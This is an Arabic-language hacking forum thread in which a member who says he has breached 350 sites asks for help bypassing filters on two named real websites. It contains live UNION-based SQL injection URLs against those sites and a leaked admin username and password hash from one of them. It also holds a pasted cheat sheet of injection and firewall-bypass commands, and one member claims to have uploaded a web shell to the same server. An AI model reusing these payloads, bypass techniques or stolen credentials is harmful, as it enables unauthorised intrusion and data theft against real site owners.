التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 01-27-2013, 09:55 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية guba.1
 

 

 
إحصائية العضو







guba.1 غير متواجد حالياً

إرسال رسالة عبر Skype إلى guba.1

 

 

إحصائية الترشيح

عدد النقاط : 10
guba.1 is on a distinguished road

افتراضي مجاب: مطلوووووب للاهميه عبد الصمد او اي شخص محترف ...


سلام عليكم ورحمه الله

اخواني انا واعوذ بالله من كلمه انا اخترقت 350 موقع بـ الـ sql يعني ولحمد لله متمكن من هاذي الثغره

لااكن واجهتني مشكله فـ الاونه الاخيره

وهيا مثل هاذا الموقع ...

كود PHP:
http://www.limacabs.com/news_desc.php?id=-7%20UNION%20%28SELECT%201,2,CONCAT_WS%28CHAR%2832,58,32%29,table_name,column_name,table_schema%29,4+from+information_schema.columns%29-- 
وهاذا ..
كود PHP:
http://hotelacostacentro.com/noticia.php?id=-11%27%20UNION%20SELECT%201,2,3,4,%28CONCAT_WS%28CHAR%2832,58,32%29,table_name,column_name,table_schema%29,6,7,8,9,10,11,12+from+information_schema.columns%29--%20- 
والكثير الكثير مثل هاذي المشكله

فـ اتمنى طريقة حل هاذي المشكله وطرح الطريقه لتعم الفائده الرجاء اي شخص يمر ع الموضوع يشارك ولو بظم صوته الى صوتي ..,

احترامي ,



Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC l'g,,,,,f gghildi uf] hgwl] h, hd aow lpjvt >>>

التوقيع

Skype

guba.col.1

 

   

رد مع اقتباس
أفضل جواب - كتبه mido868
اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة guba.1
سلام عليكم ورحمه الله

اخواني انا واعوذ بالله من كلمه انا اخترقت 350 موقع بـ الـ sql يعني ولحمد لله متمكن من هاذي الثغره

لااكن واجهتني مشكله فـ الاونه الاخيره

وهيا مثل هاذا الموقع ...

كود PHP:
http://www.limacabs.com/news_desc.php?id=-7%20UNION%20%28SELECT%201,2,CONCAT_WS%28CHAR%2832,58,32%29,table_name,column_name,table_schema%29,4+from+information_schema.columns%29-- 
وهاذا ..
كود PHP:
http://hotelacostacentro.com/noticia.php?id=-11%27%20UNION%20SELECT%201,2,3,4,%28CONCAT_WS%28CHAR%2832,58,32%29,table_name,column_name,table_schema%29,6,7,8,9,10,11,12+from+information_schema.columns%29--%20- 
والكثير الكثير مثل هاذي المشكله

فـ اتمنى طريقة حل هاذي المشكله وطرح الطريقه لتعم الفائده الرجاء اي شخص يمر ع الموضوع يشارك ولو بظم صوته الى صوتي ..,

احترامي ,


http://hotelacostacentro.com/noticia.php?id=-11

user
admin

password
5e7cf5d0c1214aacb755776e9f6a9449



hint

table_name) of information_schema.tables where table_schema=0x61636F7374615F63656E74726F

MySQL >=5
Column Count is 12

Column is 4
DB: acosta_centro
inject type mssql
راجع دروس الاخ عبد الصمد
قديم 01-27-2013, 07:52 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
SoLiTair4Ever
::. Moderators .::
 
الصورة الرمزية SoLiTair4Ever
 

 

 
إحصائية العضو









SoLiTair4Ever غير متواجد حالياً

إرسال رسالة عبر MSN إلى SoLiTair4Ever إرسال رسالة عبر Skype إلى SoLiTair4Ever

 

 

إحصائية الترشيح

عدد النقاط : 14
SoLiTair4Ever is on a distinguished road

افتراضي رد: مطلوووووب للاهميه عبد الصمد او اي شخص محترف ...


كود:
http://www.limacabs.com/news_desc.php?id=-7%20UNION%20%28SELECT%201,2,CONCAT_WS%28CHAR%2832,58,32%29,table_name,column_name,table_schema%29,4+from+information_schema.columns%29--
أظن انها blind SQL injection
التوقيع

.
..
...

.:: قـوانـين الـشبكة العـامة ::.
......
.:: قسـم التبلــيغ عن المواضيـع الملغومـة ::.
......
هــــآم جدآآآ

يمنع منعاً باتاً
رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com

الأدارة وطاقم فريق العمل لايتحملون اي مسؤلية عن مصير الموضوع عند مخالفة القوانين


...
..
.

 


التعديل الأخير تم بواسطة SoLiTair4Ever ; 01-27-2013 الساعة 07:54 PM.

   

رد مع اقتباس
قديم 01-27-2013, 08:11 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية guba.1
 

 

 
إحصائية العضو







guba.1 غير متواجد حالياً

إرسال رسالة عبر Skype إلى guba.1

 

 

إحصائية الترشيح

عدد النقاط : 10
guba.1 is on a distinguished road

افتراضي رد: مطلوووووب للاهميه عبد الصمد او اي شخص محترف ...


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة SoLiTair4Ever
كود:
http://www.limacabs.com/news_desc.php?id=-7%20UNION%20%28SELECT%201,2,CONCAT_WS%28CHAR%2832,58,32%29,table_name,column_name,table_schema%29,4+from+information_schema.columns%29--
أظن انها blind SQL injection

يعطيك العافيه اخي الكريم ع الاهتمام لااكن blind SQL injection مايكون استعلامها بـ وضع '

هاذا الي اعرفه عن الثغره هاذي لااني متعامل معها كثير

اما الموقع هاذا مصاب بـ SQL injection جربت بكل الطرق مافي امل :(

ننتظر الخبراء ,

التوقيع

Skype

guba.col.1

 

   

رد مع اقتباس
قديم 01-28-2013, 03:56 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو








خالد سعودي غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
خالد سعودي is on a distinguished road

افتراضي رد: مطلوووووب للاهميه عبد الصمد او اي شخص محترف ...


شوف بنسة للموقع الاول هذا طريقة تحطي الفلتر لانها مرتبه للامانه منقول منتدي أخر الكاتب محمد المطيري 03-02-2012, 08:10 PM وجبت الاومر المطلوبه جربه كله
جميع أوامر
SqL Injection
أوامر تخطي
Forbidden 403
أوامر تخطي
Not Acceptable
أوامر التـشفــيــر أثناء الحقن
أوامر تخطي عدم ظهور عدد الأعمدة
==============================
أوامر SqL Injection
==============================
أمر استخراج عدد الأعمدة
==============================
+order+by+
==============================
أمر استخراج العامود المصاب
==============================
+union+select+
==============================
أمر استخراج اسم قاعدة البيانات
==============================
Database()
==============================
أمر استخراج اصدار قاعدة البيانات
==============================
Version()
==============================
أمر استخراج يوزر قاعدة البيانات
User()
==============================
أمر استخراج الجداول
==============================
يوضع هذا الأمر مكان العامود المصاب
==============================
group_concat(table_name)
==============================
ويوضع هذا الأمر في نهاية الرابط
==============================
+from+information_schema.tables+where+table_schema =database()--
==============================
أمر استخراج الأعمدة
==============================
يوضع هذا الأمر مكان العامود المصاب
==============================
group_concat(column_name)
==============================
ويوضع هذا الأمر في نهاية الرابط
==============================
+from+information_schema.columns+where+table_schem a=database()--
==============================
أوامر تخطي Forbidden 403 اثناء استخراج العامود المصاب + استخراج الجداول ولأعمدة
==============================
تخطي Forbidden 403 اثناء استخراج العامود المصاب
==============================
اضافة الفلتر
==============================
/*! */
==============================
على كلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!select*/
==============================
واذا لم تنجح الطريقة العب بكلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
احرف سمول وأحرف كابتل
==============================
تخطي Forbidden 403 اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(table_name)
==============================
ليصبح بهذا الشكل
==============================
/*!GrOuP_CoNcAT(table_name)*/
==============================
وتعديل الامر
==============================
ليصبح بهذا الشكل
==============================
+from+information_schema.tables+where+table_schema =database()--
==============================
تخطي Forbidden 403 اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(column_name)
==============================
ليصبح بهذا الشكل
==============================
/*!GrOuP_CoNcAT(column_name)*/
==============================
وتعديل الامر
==============================
ليصبح بهذا الشكل
==============================
+from+information_schema.columns+where+table_schem a=database()--
==============================
ليصبح بهذا الشكل
==============================
+
==============================
from+information_schema./*!columns*/+where+table_schema=database()--
==============================
أوامر تخطي Not Acceptable
==============================
تخطي Not Acceptable اثناء استخراج العامود المصاب
==============================
اضافة الفلتر
==============================
/*! */
==============================
على كلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!select*/
==============================
واذا لم تنجح الطريقة العب بكلمة
==============================
select
==============================
لتصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
احرف سمول وأحرف كابتل
==============================
تخطي
Not Acceptable
اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(table_name)
==============================
ليصبح بالشكل دا
==============================
/*!GrOuP_CoNcAT(table_name)*/
==============================
تخطي Not Acceptable اثناء استخراج الجداول
==============================
التعديل بالأمر
==============================
select
==============================
ليصبح بهذا الشكل
==============================
/*!SeLeCt*/
==============================
التعديل بالأمر
==============================
group_concat(column_name)
==============================
ليصبح بالشكل دا
==============================
/*!GrOuP_CoNcAT(column_name)*/
==============================
أوامر تخطي الحماية من بعض الأوامر
==============================
هذا الأمر نضعه مكان العامود المصاب
==============================
concat(unhex(hex(concat(table_name,0x3a,column_nam e,0x3a,table_schema))))
==============================
وهذا الأمر نضعه في نهاية الرابط
==============================
+from+information_schema.columns--
==============================
أوامر تخطي عدم ظهور عدد الأعمدة
==============================
نقوم باضافة
==============================
+--+
==============================
في نهاية الرابط
==============================
واضافة
العلامة التي بين قوسين
==============================
(')
==============================
بعد
==============================
.php?id=1
==============================
ليصبح بهذا الشكل
==============================
.php?id=1'
==============================
الموقع الثاني مثل ماقال اخي blind SQL تسمى الحقن الاعمى
هذا الدورة http://www.vbspiders.com/vb/f431.html تري اساسيات ولزم تتعمق فيها
هذا قاعدة البيانات في الموقع الثاني[*] acosta_centro[*] information_schema
موفق


التعديل الأخير تم بواسطة mido868 ; 02-01-2013 الساعة 04:52 PM.

   

رد مع اقتباس
قديم 01-30-2013, 01:44 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية guba.1
 

 

 
إحصائية العضو







guba.1 غير متواجد حالياً

إرسال رسالة عبر Skype إلى guba.1

 

 

إحصائية الترشيح

عدد النقاط : 10
guba.1 is on a distinguished road

افتراضي رد: مطلوووووب للاهميه عبد الصمد او اي شخص محترف ...


يعطيك العافيه اخوي خالد بس جربت كل الطرق مافي امل

ننتظر عبد الصمد < الامل الوحيد


التوقيع

Skype

guba.col.1

 

   

رد مع اقتباس
قديم 01-30-2013, 04:29 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
الصورة الرمزية MO3ETH
 

 

 
إحصائية العضو






MO3ETH غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 11
MO3ETH is on a distinguished road

افتراضي رد: مطلوووووب للاهميه عبد الصمد او اي شخص محترف ...


اخي العزيز لو بدك تخترق السرفر أحقن أي موقع أخر على السرفر

على العموم أنا حقنت مةقع أخر و رفعت الشل و راح أبعثهالك الأن على الخاص

و السرفر حمايته قوية جداااااااااااااا

   

رد مع اقتباس
قديم 02-01-2013, 12:22 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية guba.1
 

 

 
إحصائية العضو







guba.1 غير متواجد حالياً

إرسال رسالة عبر Skype إلى guba.1

 

 

إحصائية الترشيح

عدد النقاط : 10
guba.1 is on a distinguished road

افتراضي رد: مطلوووووب للاهميه عبد الصمد او اي شخص محترف ...


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة MO3ETH
اخي العزيز لو بدك تخترق السرفر أحقن أي موقع أخر على السرفر

على العموم أنا حقنت مةقع أخر و رفعت الشل و راح أبعثهالك الأن على الخاص

و السرفر حمايته قوية جداااااااااااااا

اخي الكريم يعطيك العافيه ع الاهتمام

انا ماني مستهدف ولا شي انا بس احاول اتخطى فلتره الموقع هاذا لاان كثرت المواقع
الي فيها نفس المشكله فـ انا ابحث عن الحل لتعم الفائده ..,

ننتظر الحل ,

التوقيع

Skype

guba.col.1

 

   

رد مع اقتباس
قديم 02-01-2013, 06:22 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
الصورة الرمزية mido868
 

 

 
إحصائية العضو






mido868 غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى mido868

 

 

إحصائية الترشيح

عدد النقاط : 16
mido868 is on a distinguished road

افتراضي رد: مطلوووووب للاهميه عبد الصمد او اي شخص محترف ...


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة guba.1
سلام عليكم ورحمه الله

اخواني انا واعوذ بالله من كلمه انا اخترقت 350 موقع بـ الـ sql يعني ولحمد لله متمكن من هاذي الثغره

لااكن واجهتني مشكله فـ الاونه الاخيره

وهيا مثل هاذا الموقع ...

كود PHP:
http://www.limacabs.com/news_desc.php?id=-7%20UNION%20%28SELECT%201,2,CONCAT_WS%28CHAR%2832,58,32%29,table_name,column_name,table_schema%29,4+from+information_schema.columns%29-- 
وهاذا ..
كود PHP:
http://hotelacostacentro.com/noticia.php?id=-11%27%20UNION%20SELECT%201,2,3,4,%28CONCAT_WS%28CHAR%2832,58,32%29,table_name,column_name,table_schema%29,6,7,8,9,10,11,12+from+information_schema.columns%29--%20- 
والكثير الكثير مثل هاذي المشكله

فـ اتمنى طريقة حل هاذي المشكله وطرح الطريقه لتعم الفائده الرجاء اي شخص يمر ع الموضوع يشارك ولو بظم صوته الى صوتي ..,

احترامي ,


http://hotelacostacentro.com/noticia.php?id=-11

user
admin

password
5e7cf5d0c1214aacb755776e9f6a9449



hint

table_name) of information_schema.tables where table_schema=0x61636F7374615F63656E74726F

MySQL >=5
Column Count is 12

Column is 4
DB: acosta_centro
inject type mssql
راجع دروس الاخ عبد الصمد
التوقيع

علمتنى الحياة ألا اكون كالذين كتموا العلم فمات معهم
إذا عندك إقتراح وتريد تنفيذه (لو عندك اقتراح ،اكتبه هنا)
http://www.vbspiders.com/vb/t67563.html
AUHT

 

   

رد مع اقتباس
قديم 02-04-2013, 11:28 AM   رقم المشاركة : 9 (permalink)
معلومات العضو
 
الصورة الرمزية guba.1
 

 

 
إحصائية العضو







guba.1 غير متواجد حالياً

إرسال رسالة عبر Skype إلى guba.1

 

 

إحصائية الترشيح

عدد النقاط : 10
guba.1 is on a distinguished road

افتراضي رد: مطلوووووب للاهميه عبد الصمد او اي شخص محترف ...


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة mido868

http://hotelacostacentro.com/noticia.php?id=-11

user
admin

password
5e7cf5d0c1214aacb755776e9f6a9449



hint

table_name) of information_schema.tables where table_schema=0x61636F7374615F63656E74726F

MySQL >=5
Column Count is 12

Column is 4
DB: acosta_centro
inject type mssql
راجع دروس الاخ عبد الصمد

يعطيك العافيه اخوي وبارك الله فيك ,

اخي الكريم لو سمحت الحجقنه النهائيه ويارت لو تدلني ع الدرس الطلوب مني متابعته

لاان دروس عبد الصمد ماشاء الله كثيره ,

احترامي ,

التوقيع

Skype

guba.col.1

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 12:42 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0